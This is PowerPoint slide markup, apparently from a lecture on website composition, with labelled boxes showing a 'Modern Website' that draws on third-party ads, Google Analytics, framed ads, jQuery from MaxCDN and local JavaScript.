                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2350678" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350678" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EE220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5957" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8910F09B-D425-8842-B6F8-6E5D0DED5FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617538" y="4178300"/>
            <a:ext cx="79533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542"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lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ad served  from third  party  provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2133609E-82CF-4D40-81BC-A9AA7A01D0E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043113" y="2657475"/>
            <a:ext cx="5972175" cy="363538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="161710" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2224" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1273"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="38" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analytics </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(served </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google)</a:t>
            </a:r>
            <a:endParaRPr sz="1301">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB41745-DA2F-7249-A00D-9EE53E699526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2246313" y="4267200"/>
            <a:ext cx="5745162" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="1551">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3495" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1128"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="48" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ad </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr sz="1301">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125960" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5C480C6-580B-7045-B35E-D9DBA2C11F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2246313" y="5310188"/>
            <a:ext cx="2730500" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220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sz="1700">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jQuery Javsript Library  (served from MaxCDN)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300">
              <a:latin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290AFFB-02C6-F94D-A910-0D76C1352DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854325" y="1244600"/>
            <a:ext cx="4348163" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Modern</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-425" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-523" dirty="0"/>
              <a:t>Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4A9303-BBAB-E548-8151-FC8D44A30723}"/>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26980" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27165511-1A1C-644D-BC8A-3B3DDFE7A3AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="425450" y="2506663"/>
            <a:ext cx="1176338" cy="4176712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2350770"/>
              <a:gd name="T1" fmla="*/ 0 h 8348980"/>
              <a:gd name="T2" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T3" fmla="*/ 0 h 8348980"/>
              <a:gd name="T4" fmla="*/ 4625 w 2350770"/>
              <a:gd name="T5" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T6" fmla="*/ 0 w 2350770"/>
              <a:gd name="T7" fmla="*/ 16384 h 8348980"/>
              <a:gd name="T8" fmla="*/ 0 w 2350770"/>
              <a:gd name="T9" fmla="*/ 0 h 8348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0770" h="8348980">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2350678" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350678" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8348713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EE220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6981" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4CB372-52D2-FB4B-B6B0-0A2124C74032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617538" y="4178300"/>
            <a:ext cx="79533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542"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ctr">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ad served  from third  party  provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA4983B-71EA-2043-BDC4-41F4F7832C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043113" y="2657475"/>
            <a:ext cx="5972175" cy="363538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="161710" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2224" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1273"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="38" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analytics </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(served </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Google)</a:t>
            </a:r>
            <a:endParaRPr sz="1301">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FA4D873-C004-8745-8E2F-25CA5539D938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2246313" y="4267200"/>
            <a:ext cx="5745162" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="1551">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3495" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1128"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="48" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ad </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr sz="1301">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126984" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BFDF3B-9265-4F49-BD30-0B2E20A4909E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2246313" y="5310188"/>
            <a:ext cx="2730500" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220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sz="1700">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jQuery Javsript Library  (served from MaxCDN)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB84D63-4BF3-CC40-BAF2-E8DE7D2792A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5270500" y="5310188"/>
            <a:ext cx="2728913" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE220C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="1551">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="1131"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" spc="43" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1301" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr sz="1301">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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C36D555-F555-D741-B8CE-5F0EF717D33C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="734853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03" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA5A385-03B5-8544-B99F-38CCC8746901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="767556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820" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177820" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203210" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17782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8004" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE7F0FD-F74D-8C44-B12A-64F163AE8DD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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05" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34A0AD27-243B-014E-B67C-BFF9E561DBD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="737711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06" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4EC858A-01FC-D541-B576-477DE51846E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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07" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{952DA6CB-7E51-9F47-A068-3C2E785F7FF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="786923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08" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66CEE0AE-D891-EC48-8742-13F6EB05E8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7319963"/>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09" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{315D46F9-4ED3-F84C-A0FD-9F3FE10BB668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8472488" y="7362825"/>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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0731C33B-EADB-544D-BD1E-583B10F26436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827881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789" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177789" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203179" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777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8011" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD17D9C6-52C7-4543-B4DE-202C94FB4954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7405688"/>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2" name="object 12">
